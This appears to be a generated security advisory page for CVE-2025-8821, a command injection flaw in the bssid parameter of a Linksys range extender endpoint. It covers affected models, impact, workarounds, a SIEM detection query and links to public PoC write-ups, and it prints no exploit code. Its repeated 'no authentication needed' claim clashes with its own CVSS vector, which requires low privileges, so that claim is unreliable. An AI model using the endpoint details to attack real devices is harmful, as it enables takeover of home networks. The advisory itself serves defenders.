CVE-2025-8821 – This CVE describes a command injection vulnerab... (How to Fix)

Q: What is the severity of CVE-2025-8821?

CVE-2025-8821 has a CVSS score of 6.3 (MEDIUM). This CVE describes a command injection vulnerability in Linksys range extender firmware that allows remote attackers to execute arbitrary operating system commands by manipulating the bssid parameter. The vulnerability affects multiple Linksys RE series models up to August 1, 2025. Attackers can exploit this without authentication to potentially take full control of affected devices.

📋 TL;DR

This CVE describes a command injection vulnerability in Linksys range extender firmware that allows remote attackers to execute arbitrary operating system commands by manipulating the bssid parameter. The vulnerability affects multiple Linksys RE series models up to August 1, 2025. Attackers can exploit this without authentication to potentially take full control of affected devices.

💻 Affected Systems

Products:

Linksys RE6250
Linksys RE6300
Linksys RE6350
Linksys RE6500
Linksys RE7000
Linksys RE9000

Versions: All versions up to 20250801

Operating Systems: Embedded Linux firmware

Default Config Vulnerable: ⚠️ Yes

Notes: All default configurations are vulnerable as the vulnerable endpoint is accessible without authentication.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing persistent backdoor installation, network pivoting to internal systems, and data exfiltration.

🟠

Likely Case

Device takeover for botnet recruitment, credential harvesting from connected devices, or network disruption.

🟢

If Mitigated

Limited impact if devices are behind firewalls with strict inbound filtering and network segmentation.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable and public exploit details exist.

🏢 Internal Only: MEDIUM - Internal attackers could exploit this to pivot through the network.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Proof-of-concept exploit is publicly available on GitHub, making exploitation straightforward for attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Check Linksys support website regularly for firmware updates addressing CVE-2025-8821.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate Linksys range extenders on separate VLANs with strict firewall rules preventing external access to management interfaces.

Access Control

all

Implement network access control lists to restrict access to the vulnerable /goform/RP_setBasic endpoint.

🧯 If You Can't Patch

Disable remote management features on affected devices
Replace vulnerable devices with patched alternatives if available

🔍 How to Verify

Check if Vulnerable:

Check device firmware version via web interface (typically under Administration > Firmware Update) and verify if it's dated before August 1, 2025.

Check Version:

No CLI command available. Use web interface: http://[device-ip]/FirmwareUpdate.htm

Verify Fix Applied:

Verify firmware version is newer than 20250801 or check vendor advisory for specific patched version.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /goform/RP_setBasic with shell metacharacters in bssid parameter
Unexpected process execution from web server context

Network Indicators:

HTTP requests containing shell commands in URL parameters
Outbound connections from range extenders to suspicious external IPs

SIEM Query:

source="linksys-extender" AND (url="/goform/RP_setBasic" AND (param="bssid" AND value MATCHES "[;&|`$()]"))

📊 Metadata

CVE ID: CVE-2025-8821

CVSS v3 Score: 6.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-77

EPSS Score: 0.24% exploit probability (46.5th percentile)

Published: August 11, 2025

Last Updated: September 4, 2025

🔗 References

https://github.com/wudipjq/my_vuln/blob/main/Linksys1/vuln_55/55.md Exploit,Third Party Advisory
https://github.com/wudipjq/my_vuln/blob/main/Linksys1/vuln_55/55.md#poc Exploit,Third Party Advisory
https://vuldb.com/?ctiid.319355 Permissions Required,VDB Entry
https://vuldb.com/?id.319355 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.626685 Third Party Advisory,VDB Entry
https://www.linksys.com/ Product
https://github.com/wudipjq/my_vuln/blob/main/Linksys1/vuln_55/55.md Exploit,Third Party Advisory
https://github.com/wudipjq/my_vuln/blob/main/Linksys1/vuln_55/55.md#poc Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-8821, you might also want to check these: